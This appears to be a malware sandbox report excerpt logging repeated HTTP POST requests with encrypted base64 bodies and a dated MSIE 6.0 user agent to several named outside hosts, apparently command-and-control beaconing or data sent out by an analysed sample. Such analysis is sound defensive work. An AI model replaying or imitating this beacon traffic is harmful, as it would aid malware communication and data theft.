69 4a 4f 68 44 31 36 75 72 41 53 56 51 71 70 6f 57 44 49 76 4d 44 33 64 46 68 52 33 61 2f 70 66 44 46 4b 6e 49 73 78 45 30 36 54 48 74 37 31 34 4a 36 57 47 4d 45 59 36 43 4e 35 78 61 42 5a 4f 72 46 48 35 33 6f 70 42 70 39 64 44 79 39 41 52 6f 44 6b 50 43 45 78 34 69 42 64 52 64 44 4e 77 6e 71 79 34 39 59 52 5a 38 6d 70 45 77 38 67 74 43 4b 6b 6d 74 73 70 61 6c 4a 73 79 31 32 50 79 2f 66 64 62 48 6e 42 5a 35 6e 36 44 73 37 52 6c 4c 69 6c 56 56 6b 2b 55 77 45 36 65 35 37 71 31 78 5a 2b 48 4c 67 4f 58 43 30 51 33 54 78 69 44 79 67 66 71 41 65 43 74 45 61 4e 7a 69 73 65 4c 31 51 70 56 69 65 6f 66 76 52 46 31 46 38 77 7a 39 42 6e 67 4e 6b 75 4f 68 37 34 69 71 74 74 48 2b 34 50 53 2f 36 34 37 69 46 77 68 71 6f 41 56 59 6a 74 6d 56 53 35 31 6e 64 56 45 72 39 44 6e 67 68 47 6b 6c 65 58 4a 34 5a 6c 4b 39 36 32 45 4f 62 5a 2f 41 30 34 6b 43 61 30 35 6e 62 4d 70 56 70 76 39 79 68 2f 48 63 59 6d 5a 64 34 73 39 63 56 52 39 47 53 70 66 6a 5a 6d 61 48 4d 45 3d Data Ascii: OXu3yEEx/cXVjD1KIFlD+xoLYZa/Q6BsBUSM16l4QVEjPll/EiCGRYZbqsxhaKubcvYFNj+Z4KRunWCqeFaQFRdtV3WI51FnvtrguZpH0I3F3e4X+d9WLRQ8jtr7eYu6JRGL3WllKsIi4lgmgeBFy/yJTRz+pnbnrfBjlCTI+ijvWqKC6VDRV/BxNxHGXRMVTWhODImtUS1kCVaQuEVy2M1H4k29TrRamaKwiJOhD16urASVQqpoWDIvMD3dFhR3a/pfDFKnIsxE06THt714J6WGMEY6CN5xaBZOrFH53opBp9dDy9ARoDkPCEx4iBdRdDNwnqy49YRZ8mpEw8gtCKkmtspalJsy12Py/fdbHnBZ5n6Ds7RlLilVVk+UwE6e57q1xZ+HLgOXC0Q3TxiDygfqAeCtEaNziseL1QpVieofvRF1F8wz9BngNkuOh74iqttH+4PS/647iFwhqoAVYjtmVS51ndVEr9DnghGkleXJ4ZlK962EObZ/A04kCa05nbMpVpv9yh/HcYmZd4s9cVR9GSpfjZmaHME=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 4b 70 6b 4b 79 66 51 7a 2f 63 57 77 73 48 44 6d 54 38 37 52 50 30 63 6e 67 30 50 73 30 38 65 4f 61 45 69 59 61 30 71 6c 31 34 33 73 6c 41 37 58 6b 2f 5a 51 35 50 50 54 4f 36 77 71 67 75 77 74 64 57 32 43 30 54 67 30 6b 49 50 72 6c 34 67 52 65 56 7a 75 77 30 38 2b 48 71 6d 47 2f 56 56 4d 70 63 41 61 61 50 49 71 7a 2f 54 77 41 79 41 32 6b 65 73 33 36 35 33 34 51 32 38 48 79 4f 68 4b 30 77 70 51 36 57 65 35 61 4d 31 51 32 79 79 47 48 59 75 68 47 2f 50 51 6b 75 4d 33 79 68 2f 77 4b 51 66 72 4c 72 6e 36 2f 55 6e 33 78 4d 6e 45 55 34 5a 6f 70 53 59 47 73 4a 46 61 77 4b 43 34 2f 42 50 30 66 67 77 71 51 41 42 52 2b 68 78 77 72 4f 7a 49 71 50 56 5a 72 41 4c 66 72 74 59 6f 52 4f 75 37 4f 77 2f 62 57 4f 4d 6c 78 2f 79 73 64 36 36 6d 66 74 73 37 55 70 51 42 67 37 71 52 31 55 32 53 36 73 47 59 2b 66 54 4c 54 48 34 35 41 58 7a 38 54 65 64 32 62 4e 67 35 41 67 76 54 49 69 47 63 69 4f 59 76 57 5a 59 51 77 71 45 78 58 70 46 34 68 69 46 35 61 6a 48 68 31 44 39 69 62 35 55 4d 41 66 4c 66 4c 58 65 70 62 62 58 59 43 42 59 4f 6d 4a 57 6b 66 4b 43 4b 4f 6e 59 53 65 6f 74 6e 59 38 75 33 75 5a 77 31 4c 55 6c 4d 68 30 39 44 30 65 6a 4c 56 6d 50 6f 52 4f 6b 77 4d 51 62 38 53 46 46 76 76 56 77 46 77 7a 2b 51 62 49 66 39 67 31 48 42 72 74 54 70 54 36 75 4f 78 6d 70 68 47 54 34 77 67 2b 33 37 4f 2b 38 2f 62 35 34 78 77 58 42 61 4f 30 4f 46 74 42 6e 37 37 4f 52 39 32 62 64 6b 71 32 78 43 76 5a 41 63 4d 6a 47 49 67 71 2b 56 4c 4e 5a 31 76 47 71 35 7a 62 48 2b 68 67 47 42 4f 79 4f 54 52 66 6d 6f 64 47 39 45 47 4e 35 73 37 78 79 70 69 2b 54 50 42 56 63 73 2f 79 57 6a 31 4d 57 6e 66 64 66 61 59 71 61 45 70 37 35 35 4f 34 65 5a 51 49 43 77 52 62 71 74 33 35 54 66 2b 47 75 48 4d 42 36 2b 63 51 2f 6c 34 7a 69 44 57 51 3d 3d Data Ascii: KpkKyfQz/cWwsHDmT87RP0cng0Ps08eOaEiYa0ql143slA7Xk/ZQ5PPTO6wqguwtdW2C0Tg0kIPrl4gReVzuw08+HqmG/VVMpcAaaPIqz/TwAyA2kes36534Q28HyOhK0wpQ6We5aM1Q2yyGHYuhG/PQkuM3yh/wKQfrLrn6/Un3xMnEU4ZopSYGsJFawKC4/BP0fgwqQABR+hxwrOzIqPVZrALfrtYoROu7Ow/bWOMlx/ysd66mfts7UpQBg7qR1U2S6sGY+fTLTH45AXz8Ted2bNg5AgvTIiGciOYvWZYQwqExXpF4hiF5ajHh1D9ib5UMAfLfLXepbbXYCBYOmJWkfKCKOnYSeotnY8u3uZw1LUlMh09D0ejLVmPoROkwMQb8SFFvvVwFwz+QbIf9g1HBrtTpT6uOxmphGT4wg+37O+8/b54xwXBaO0OFtBn77OR92bdkq2xCvZAcMjGIgq+VLNZ1vGq5zbH+hgGBOyOTRfmodG9EGN5s7xypi+TPBVcs/yWj1MWnfdfaYqaEp755O4eZQICwRbqt35Tf+GuHMB6+cQ/l4ziDWQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 66 69 30 79 4a 36 35 43 41 4d 59 46 4e 37 66 38 75 61 6f 42 36 42 47 30 67 6b 30 75 2b 69 77 49 77 72 32 49 72 79 6b 77 4d 72 46 66 38 57 2f 43 31 35 76 68 49 4d 2f 4a 6d 4f 71 73 72 4a 41 49 55 77 56 7a 62 4d 6d 6f 49 62 57 4f 4f 63 68 4f 34 74 69 54 64 31 65 6a 38 75 4b 6a 77 38 55 51 55 6e 50 4b 44 72 4c 65 75 33 67 58 58 4f 48 6a 47 4c 78 57 52 59 65 49 4d 4f 68 34 42 58 46 72 52 5a 72 74 2f 77 73 6c 70 54 77 56 37 5a 56 56 79 55 2f 58 52 7a 61 50 74 76 51 4e 50 53 71 58 58 48 76 56 6c 2b 69 77 50 54 62 56 48 2f 7a 51 6a 46 64 37 62 32 43 2f 2b 45 5a 63 52 62 52 6a 76 63 50 61 6e 2f 4c 6a 70 70 4f 54 4a 69 39 4b 33 78 46 77 44 7a 66 70 69 5a 50 48 31 78 36 68 4f 50 33 46 41 4d 77 71 61 57 6f 6e 6d 4c 77 66 67 6b 70 70 51 77 6a 68 31 75 6c 52 72 49 64 62 5a 65 4e 32 59 4b 30 62 56 6f 51 31 54 48 49 58 68 63 44 67 43 50 53 56 58 34 54 57 57 66 6c 78 37 79 34 39 4d 56 50 38 49 79 4e 61 57 76 36 44 31 43 6b 46 46 6a 35 32 47 68 32 73 43 38 48 53 35 63 35 6a 30 57 4b 47 6c 4d 72 64 54 45 53 37 6f 63 33 4d 64 61 5a 6c 46 34 4d 39 78 50 77 65 51 4e 64 30 32 67 31 64 6c 6c 33 46 41 6f 71 63 56 39 76 6c 66 50 72 45 47 6a 44 67 52 6b 6d 62 56 6d 61 44 6e 72 32 71 71 4f 6e 71 6e 50 6d 30 62 6a 62 39 34 50 67 73 39 37 66 66 4d 58 2b 43 6c 6c 4a 6f 4e 70 2f 62 79 45 4b 57 30 43 6d 6e 34 45 4c 57 78 52 72 44 41 63 68 54 74 59 4b 56 72 4d 78 51 48 42 34 61 69 47 39 73 65 4b 4a 66 7a 6c 52 32 33 35 6b 6d 53 49 63 6b 75 49 74 6e 42 64 30 72 48 68 5a 53 54 6d 61 41 78 63 36 6b 4b 67 50 2f 47 46 54 46 61 4c 4e 66 30 61 70 67 59 48 70 6d 48 64 6b 73 2b 32 6a 79 4c 33 2f 75 73 79 4f 35 61 59 49 33 49 63 65 6d 73 41 77 35 46 56 34 75 6c 73 50 68 47 62 4e 66 70 31 65 44 49 68 31 76 62 45 4d 3d Data Ascii: fi0yJ65CAMYFN7f8uaoB6BG0gk0u+iwIwr2IrykwMrFf8W/C15vhIM/JmOqsrJAIUwVzbMmoIbWOOchO4tiTd1ej8uKjw8UQUnPKDrLeu3gXXOHjGLxWRYeIMOh4BXFrRZrt/wslpTwV7ZVVyU/XRzaPtvQNPSqXXHvVl+iwPTbVH/zQjFd7b2C/+EZcRbRjvcPan/LjppOTJi9K3xFwDzfpiZPH1x6hOP3FAMwqaWonmLwfgkppQwjh1ulRrIdbZeN2YK0bVoQ1THIXhcDgCPSVX4TWWflx7y49MVP8IyNaWv6D1CkFFj52Gh2sC8HS5c5j0WKGlMrdTES7oc3MdaZlF4M9xPweQNd02g1dll3FAoqcV9vlfPrEGjDgRkmbVmaDnr2qqOnqnPm0bjb94Pgs97ffMX+CllJoNp/byEKW0Cmn4ELWxRrDAchTtYKVrMxQHB4aiG9seKJfzlR235kmSIckuItnBd0rHhZSTmaAxc6kKgP/GFTFaLNf0apgYHpmHdks+2jyL3/usyO5aYI3IcemsAw5FV4ulsPhGbNfp1eDIh1vbEM=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 38 72 6f 39 55 73 58 34 43 63 5a 4d 63 33 67 31 37 42 4e 4d 6a 7a 34 74 5a 4c 65 54 47 33 38 55 79 56 6b 31 57 48 48 50 44 79 57 73 68 2b 2f 48 49 51 38 62 73 4d 49 4b 59 38 33 37 54 31 47 2b 31 41 6a 33 52 61 62 42 5a 63 56 73 2f 67 7a 52 30 4d 32 48 49 51 75 75 49 44 45 44 76 6b 61 67 33 69 71 4d 53 6f 49 65 6a 79 2b 67 57 70 77 54 4c 79 73 50 57 33 44 4e 77 51 63 6e 58 32 75 31 63 4a 54 74 4b 7a 59 56 65 63 37 41 4c 37 6b 63 52 79 57 63 68 37 61 42 75 57 36 68 5a 33 72 4f 6e 74 57 43 6b 5a 31 66 51 69 62 6d 54 78 57 70 68 68 65 71 36 4f 42 46 76 37 50 7a 68 48 52 6b 73 32 4f 63 70 7a 36 33 50 64 45 47 59 54 2b 2f 2b 79 7a 62 6d 37 4d 5a 38 38 67 77 55 6e 41 50 46 43 72 65 33 67 31 64 71 37 48 79 77 52 2b 59 42 6b 6f 43 48 72 54 6a 70 4d 6a 68 49 6c 72 51 6f 52 48 53 72 72 52 61 48 48 77 4d 65 72 6b 76 34 53 66 7a 4f 56 42 70 4e 33 50 4b 67 53 50 35 56 6b 72 38 76 62 41 32 2b 53 31 42 51 51 6d 4b 46 67 77 6b 33 46 59 2f 79 57 55 7a 62 32 2b 4c 6c 33 62 79 77 6f 77 6f 36 68 73 44 38 55 4a 76 39 63 36 41 47 59 74 75 38 57 6f 78 71 58 5a 55 2f 63 49 57 49 49 6d 36 74 46 50 5a 6f 4e 4e 72 75 77 6e 32 61 48 4f 74 35 4b 2b 73 4f 48 45 56 6f 49 57 43 56 2b 42 34 49 66 57 2f 41 37 56 51 70 6a 34 43 51 42 4f 4b 6b 73 48 6d 36 63 65 31 4a 37 6f 6a 41 45 55 54 4e 55 31 6d 62 76 6e 62 30 62 54 6a 7a 63 64 33 38 7a 37 6b 45 32 64 71 64 5a 65 77 52 56 6d 46 65 65 57 57 39 68 58 49 58 2f 37 34 56 79 44 35 4a 55 77 45 57 6b 2f 35 4a 41 6a 4e 2f 33 69 56 49 43 2b 4b 36 65 39 4a 6e 62 79 4a 58 66 7a 41 7a 33 55 34 63 59 54 63 67 6e 4b 6c 42 67 71 7a 7a 68 48 56 77 6c 6e 67 79 4a 4a 70 58 34 61 67 61 31 79 71 2f 64 75 62 49 73 65 50 39 53 6c 65 2f 44 77 78 51 33 79 4b 35 31 73 32 34 4b 34 3d Data Ascii: 8ro9UsX4CcZMc3g17BNMjz4tZLeTG38UyVk1WHHPDyWsh+/HIQ8bsMIKY837T1G+1Aj3RabBZcVs/gzR0M2HIQuuIDEDvkag3iqMSoIejy+gWpwTLysPW3DNwQcnX2u1cJTtKzYVec7AL7kcRyWch7aBuW6hZ3rOntWCkZ1fQibmTxWphheq6OBFv7PzhHRks2Ocpz63PdEGYT+/+yzbm7MZ88gwUnAPFCre3g1dq7HywR+YBkoCHrTjpMjhIlrQoRHSrrRaHHwMerkv4SfzOVBpN3PKgSP5Vkr8vbA2+S1BQQmKFgwk3FY/yWUzb2+Ll3bywowo6hsD8UJv9c6AGYtu8WoxqXZU/cIWIIm6tFPZoNNruwn2aHOt5K+sOHEVoIWCV+B4IfW/A7VQpj4CQBOKksHm6ce1J7ojAEUTNU1mbvnb0bTjzcd38z7kE2dqdZewRVmFeeWW9hXIX/74VyD5JUwEWk/5JAjN/3iVIC+K6e9JnbyJXfzAz3U4cYTcgnKlBgqzzhHVwlngyJJpX4aga1yq/dubIseP9Sle/DwxQ3yK51s24K4=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 66 69 30 79 4a 36 35 43 41 4d 59 46 4e 37 66 38 75 61 6f 42 36 42 47 30 67 6b 30 75 2b 69 77 49 77 72 32 49 72 79 6b 77 4d 72 46 66 38 57 2f 43 31 35 76 68 49 4d 2f 4a 6d 4f 71 73 72 4a 41 49 55 77 56 7a 62 4d 6d 6f 49 62 57 4f 4f 63 68 4f 34 74 69 54 64 31 65 6a 38 75 4b 6a 77 38 55 51 55 6e 50 4b 44 72 4c 65 75 33 67 58 58 4f 48 6a 47 4c 78 57 52 59 65 49 4d 4f 68 34 42 58 46 72 52 5a 72 74 2f 77 73 6c 70 54 77 56 37 5a 56 56 79 55 2f 58 52 7a 61 50 74 76 51 4e 50 53 71 58 58 48 76 56 6c 2b 69 77 50 54 62 56 48 2f 7a 51 6a 46 64 37 62 32 43 2f 2b 45 5a 63 52 62 52 6a 76 63 50 61 6e 2f 4c 6a 70 70 4f 54 4a 69 39 4b 33 78 46 77 44 7a 66 70 69 5a 50 48 31 78 36 68 4f 50 33 46 41 4d 77 71 61 57 6f 6e 6d 4c 77 66 67 6b 70 70 51 77 6a 68 31 75 6c 52 72 49 64 62 5a 65 4e 32 59 4b 30 62 56 6f 51 31 54 48 49 58 68 63 44 67 43 50 53 56 58 34 54 57 57 66 6c 78 37 79 34 39 4d 56 50 38 49 79 4e 61 57 76 36 44 31 43 6b 46 46 6a 35 32 47 68 32 73 43 38 48 53 35 63 35 6a 30 57 4b 47 6c 4d 72 64 54 45 53 37 6f 63 33 4d 64 61 5a 6c 46 34 4d 39 78 50 77 65 51 4e 64 30 32 67 31 64 6c 6c 33 46 41 6f 71 63 56 39 76 6c 66 50 72 45 47 6a 44 67 52 6b 6d 62 56 6d 61 44 6e 72 32 71 71 4f 6e 71 6e 50 6d 30 62 6a 62 39 34 50 67 73 39 37 66 66 4d 58 2b 43 6c 6c 4a 6f 4e 70 2f 62 79 45 4b 57 30 43 6d 6e 34 45 4c 57 78 52 72 44 41 63 68 54 74 59 4b 56 72 4d 78 51 48 42 34 61 69 47 39 73 65 4b 4a 66 7a 6c 52 32 33 35 6b 6d 53 49 63 6b 75 49 74 6e 42 64 30 72 48 68 5a 53 54 6d 61 41 78 63 36 6b 4b 67 50 2f 47 46 54 46 61 4c 4e 66 30 61 70 67 59 48 70 6d 48 64 6b 73 2b 32 6a 79 4c 33 2f 75 73 79 4f 35 61 59 49 33 49 63 65 6d 73 41 77 35 46 56 34 75 6c 73 50 68 47 62 4e 66 70 31 65 44 49 68 31 76 62 45 4d 3d Data Ascii: fi0yJ65CAMYFN7f8uaoB6BG0gk0u+iwIwr2IrykwMrFf8W/C15vhIM/JmOqsrJAIUwVzbMmoIbWOOchO4tiTd1ej8uKjw8UQUnPKDrLeu3gXXOHjGLxWRYeIMOh4BXFrRZrt/wslpTwV7ZVVyU/XRzaPtvQNPSqXXHvVl+iwPTbVH/zQjFd7b2C/+EZcRbRjvcPan/LjppOTJi9K3xFwDzfpiZPH1x6hOP3FAMwqaWonmLwfgkppQwjh1ulRrIdbZeN2YK0bVoQ1THIXhcDgCPSVX4TWWflx7y49MVP8IyNaWv6D1CkFFj52Gh2sC8HS5c5j0WKGlMrdTES7oc3MdaZlF4M9xPweQNd02g1dll3FAoqcV9vlfPrEGjDgRkmbVmaDnr2qqOnqnPm0bjb94Pgs97ffMX+CllJoNp/byEKW0Cmn4ELWxRrDAchTtYKVrMxQHB4aiG9seKJfzlR235kmSIckuItnBd0rHhZSTmaAxc6kKgP/GFTFaLNf0apgYHpmHdks+2jyL3/usyO5aYI3IcemsAw5FV4ulsPhGbNfp1eDIh1vbEM=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 55 66 66 42 79 38 53 61 42 63 61 7a 54 4d 4d 62 33 2b 65 46 6f 35 66 47 67 58 76 38 32 76 39 6f 4f 48 78 77 37 5a 54 37 65 70 70 71 73 50 30 78 51 4f 4e 48 33 67 2f 58 54 55 71 51 44 69 54 74 45 62 5a 4c 64 4e 77 73 73 6a 4e 59 4d 67 43 48 36 56 34 72 4e 73 4a 69 54 4c 39 6c 63 30 32 79 51 77 6f 59 52 4d 31 6d 51 6c 6d 35 2b 34 30 2f 46 39 30 55 73 32 6c 44 54 56 75 74 6f 6c 69 79 6e 30 4a 56 38 70 63 4e 42 67 44 70 62 4e 45 57 6a 54 77 2f 76 43 73 50 41 66 6d 67 4a 77 43 6e 35 79 53 68 71 34 34 77 30 38 68 34 65 32 42 72 66 70 7a 55 62 6b 66 31 59 4c 77 71 47 67 39 65 6f 63 6f 48 34 76 4a 41 75 61 77 34 71 78 77 30 4c 4e 6a 67 78 30 53 6e 4a 6e 6f 59 64 65 30 69 2b 63 55 45 33 48 2b 65 36 6f 61 47 72 78 42 54 69 6f 4a 42 59 5a 4c 6b 55 43 46 4a 42 33 47 72 4d 74 6e 36 53 66 69 43 4b 52 7a 78 56 4b 57 5a 61 30 75 62 4c 59 30 4a 52 62 7a 56 43 74 69 32 39 54 77 7a 55 56 72 4f 70 7a 34 4e 34 52 47 35 69 4a 43 57 31 66 38 2b 62 49 30 77 43 57 69 55 49 6a 6d 32 69 66 62 37 6f 68 36 2f 6d 6a 69 6c 52 66 30 47 54 30 76 37 6d 45 48 6c 4b 49 7a 61 4a 6a 62 2b 4c 72 47 53 46 6d 47 77 68 47 67 61 6d 4d 6a 67 4f 6b 76 78 53 79 72 43 42 49 2b 34 45 67 6d 65 33 52 35 4f 37 57 6a 45 75 6d 2f 6e 51 35 59 5a 6c 4b 47 4f 6b 31 45 41 33 39 30 2f 67 33 48 44 6f 78 74 71 76 6c 4a 43 31 42 57 44 69 31 44 71 4b 61 37 4e 73 73 75 34 50 54 66 69 50 44 67 67 64 4f 48 4d 6f 2b 38 61 37 32 75 78 49 58 35 43 39 53 2f 55 63 74 78 6c 6b 51 4b 6f 63 33 72 6b 78 50 77 32 38 46 69 39 4b 71 49 2b 50 37 6f 4a 46 6c 55 6d 38 36 38 33 6a 65 73 61 42 74 59 34 69 4d 43 66 36 36 6c 78 57 50 64 73 6e 69 42 79 4c 2f 6b 76 59 47 2f 4b 35 77 3d 3d Data Ascii: UffBy8SaBcazTMMb3+eFo5fGgXv82v9oOHxw7ZT7eppqsP0xQONH3g/XTUqQDiTtEbZLdNwssjNYMgCH6V4rNsJiTL9lc02yQwoYRM1mQlm5+40/F90Us2lDTVutoliyn0JV8pcNBgDpbNEWjTw/vCsPAfmgJwCn5yShq44w08h4e2BrfpzUbkf1YLwqGg9eocoH4vJAuaw4qxw0LNjgx0SnJnoYde0i+cUE3H+e6oaGrxBTioJBYZLkUCFJB3GrMtn6SfiCKRzxVKWZa0ubLY0JRbzVCti29TwzUVrOpz4N4RG5iJCW1f8+bI0wCWiUIjm2ifb7oh6/mjilRf0GT0v7mEHlKIzaJjb+LrGSFmGwhGgamMjgOkvxSyrCBI+4Egme3R5O7WjEum/nQ5YZlKGOk1EA390/g3HDoxtqvlJC1BWDi1DqKa7Nssu4PTfiPDggdOHMo+8a72uxIX5C9S/UctxlkQKoc3rkxPw28Fi9KqI+P7oJFlUm8683jesaBtY4iMCf66lxWPdsniByL/kvYG/K5w==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 66 45 57 2f 4f 57 46 39 45 63 59 75 57 78 76 57 77 50 65 2f 67 54 72 49 49 6e 5a 66 30 6f 6e 59 4a 58 72 63 54 6c 73 64 6c 33 4e 71 70 52 52 32 73 74 30 68 49 54 61 47 42 44 6c 4a 74 2f 5a 33 56 35 50 61 54 70 78 55 6b 49 42 38 47 72 4d 41 4c 72 6a 5a 50 70 47 6e 32 47 6c 38 6d 6c 44 56 63 59 57 62 37 6e 52 5a 62 62 6d 66 52 46 69 49 2f 78 56 43 58 6f 77 30 4c 2b 67 6a 56 77 31 2b 6e 35 74 35 70 48 6c 52 55 63 31 6d 43 6d 4d 6c 44 50 54 66 38 53 6d 6d 2f 50 31 65 54 6d 79 4b 36 4a 39 59 4b 4e 6a 44 5a 4a 77 37 39 53 41 57 77 4f 63 43 63 58 49 72 64 55 68 76 68 42 6a 4d 4f 39 53 62 2f 6c 70 2f 49 79 52 6a 44 33 4b 4f 79 74 50 41 61 4e 79 6f 36 59 4e 58 2f 78 46 36 62 6c 71 33 49 56 37 49 63 64 37 35 59 42 56 30 6f 64 6c 4d 44 63 75 46 32 37 50 75 35 63 66 59 56 4d 5a 31 37 49 36 64 42 67 64 48 43 44 4a 78 34 69 6b 36 4f 4a 71 4e 57 62 33 2f 67 49 31 6f 66 44 30 41 2f 61 6f 4f 2f 44 47 4b 56 56 66 45 48 57 6b 6f 47 5a 4d 73 4f 73 43 64 4b 43 34 4f 76 31 4a 77 76 64 54 69 50 2b 4c 41 35 70 65 31 7a 2f 74 6c 62 67 59 2b 2f 68 2b 4a 4d 6c 2f 71 58 38 55 73 36 69 59 33 6b 6f 47 5a 66 4f 4d 66 2b 49 53 4e 64 6c 4e 4c 71 4e 62 41 4d 51 36 51 65 51 69 75 36 4b 31 2b 49 78 53 34 30 77 36 75 63 4e 41 56 43 2b 66 42 6c 38 67 39 68 43 6e 76 52 61 72 30 53 43 2b 62 47 51 6b 54 68 78 4e 39 4b 57 66 76 51 76 35 67 4f 56 47 47 31 6c 39 68 34 30 72 6b 49 70 61 31 67 41 4e 63 38 2f 69 5a 49 56 70 75 44 30 51 46 6b 44 68 53 67 76 2f 36 47 2f 58 58 79 61 71 68 58 31 63 36 35 78 2b 69 45 38 35 35 61 7a 46 69 4d 41 66 69 66 6d 71 6f 74 6a 71 49 2f 75 30 4f 79 55 45 34 62 2b 65 50 74 56 31 36 39 69 6d 53 46 71 4f 41 79 62 62 4a 73 34 34 4e 47 78 78 78 4b 50 79 78 31 77 3d 3d Data Ascii: fEW/OWF9EcYuWxvWwPe/gTrIInZf0onYJXrcTlsdl3NqpRR2st0hITaGBDlJt/Z3V5PaTpxUkIB8GrMALrjZPpGn2Gl8mlDVcYWb7nRZbbmfRFiI/xVCXow0L+gjVw1+n5t5pHlRUc1mCmMlDPTf8Smm/P1eTmyK6J9YKNjDZJw79SAWwOcCcXIrdUhvhBjMO9Sb/lp/IyRjD3KOytPAaNyo6YNX/xF6blq3IV7Icd75YBV0odlMDcuF27Pu5cfYVMZ17I6dBgdHCDJx4ik6OJqNWb3/gI1ofD0A/aoO/DGKVVfEHWkoGZMsOsCdKC4Ov1JwvdTiP+LA5pe1z/tlbgY+/h+JMl/qX8Us6iY3koGZfOMf+ISNdlNLqNbAMQ6QeQiu6K1+IxS40w6ucNAVC+fBl8g9hCnvRar0SC+bGQkThxN9KWfvQv5gOVGG1l9h40rkIpa1gANc8/iZIVpuD0QFkDhSgv/6G/XXyaqhX1c65x+iE855azFiMAfifmqotjqI/u0OyUE4b+ePtV169imSFqOAybbJs44NGxxxKPyx1w==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 38 6e 4b 6a 6c 4d 59 67 44 4d 61 49 47 6c 33 4f 34 59 46 78 55 2b 6e 78 61 46 59 6d 72 70 6c 43 57 69 6b 41 50 64 78 4d 2b 63 49 69 46 79 4a 44 47 31 34 75 67 33 52 4f 43 71 50 6f 61 38 48 62 66 4c 4b 42 48 6e 66 37 37 63 55 48 4c 74 47 2f 35 45 55 39 32 4d 39 58 33 76 61 64 63 74 53 5a 30 56 51 6f 67 61 49 6b 53 4d 57 51 51 49 76 78 73 5a 6e 58 34 47 6f 79 72 35 59 4a 71 6d 58 56 44 55 30 47 51 58 71 4d 35 37 55 50 69 33 34 5a 30 38 33 47 70 54 6b 48 67 6f 67 38 63 55 58 33 4c 4e 7a 30 64 4d 4b 33 79 5a 53 6a 43 34 6e 54 50 73 34 6a 52 36 58 58 75 37 52 66 37 76 35 57 66 4e 42 73 36 63 33 38 66 49 57 72 57 7a 30 75 48 54 73 6a 55 6f 49 2f 6e 46 78 71 62 61 65 6c 4f 41 6a 55 62 4b 6d 53 39 4e 4b 74 5a 77 55 7a 6e 4d 42 61 43 7a 31 63 48 70 49 4a 43 51 68 44 6e 68 4d 75 53 47 66 2b 68 2b 6d 38 4a 74 42 2f 57 68 39 59 6c 67 78 53 53 2b 4e 65 38 61 63 5a 2f 53 30 41 66 79 32 73 76 59 61 72 74 4a 39 77 4a 59 34 36 36 63 6e 53 74 79 2f 53 46 50 48 4f 6e 2f 53 39 4e 46 63 41 6b 77 38 74 59 77 58 39 51 68 36 53 6b 71 6e 39 68 49 6a 57 65 49 71 57 4e 51 30 47 72 43 34 53 63 4a 7a 4f 53 7a 37 33 79 58 7a 44 39 66 74 4b 7a 39 2b 47 65 66 75 67 6c 54 45 44 39 4b 46 49 4a 4d 72 70 4b 58 71 57 63 39 66 44 6f 47 66 4e 45 47 61 78 37 57 57 44 2b 77 49 6b 52 33 4c 6e 59 65 7a 72 68 58 35 48 33 42 76 69 4e 6d 49 6f 66 65 58 42 6e 41 61 65 63 38 67 37 2b 54 37 72 72 4e 52 46 76 57 68 44 75 4e 4c 62 6d 4f 65 35 69 33 45 36 47 5a 51 6f 33 6f 2b 47 68 47 47 39 74 70 52 4c 2b 61 4c 45 34 6f 68 75 58 5a 61 30 67 44 71 69 54 7a 66 64 31 58 74 2b 32 47 52 58 55 65 79 65 39 4c 49 38 73 76 6d 39 66 6a 6d 2f 30 52 34 55 66 49 45 74 6b 65 49 42 56 6f 70 70 56 45 52 79 2f 4c 32 6d 70 41 3d 3d Data Ascii: 8nKjlMYgDMaIGl3O4YFxU+nxaFYmrplCWikAPdxM+cIiFyJDG14ug3ROCqPoa8HbfLKBHnf77cUHLtG/5EU92M9X3vadctSZ0VQogaIkSMWQQIvxsZnX4Goyr5YJqmXVDU0GQXqM57UPi34Z083GpTkHgog8cUX3LNz0dMK3yZSjC4nTPs4jR6XXu7Rf7v5WfNBs6c38fIWrWz0uHTsjUoI/nFxqbaelOAjUbKmS9NKtZwUznMBaCz1cHpIJCQhDnhMuSGf+h+m8JtB/Wh9YlgxSS+Ne8acZ/S0Afy2svYartJ9wJY466cnSty/SFPHOn/S9NFcAkw8tYwX9Qh6Skqn9hIjWeIqWNQ0GrC4ScJzOSz73yXzD9ftKz9+GefuglTED9KFIJMrpKXqWc9fDoGfNEGax7WWD+wIkR3LnYezrhX5H3BviNmIofeXBnAaec8g7+T7rrNRFvWhDuNLbmOe5i3E6GZQo3o+GhGG9tpRL+aLE4ohuXZa0gDqiTzfd1Xt+2GRXUeye9LI8svm9fjm/0R4UfIEtkeIBVoppVERy/L2mpA==
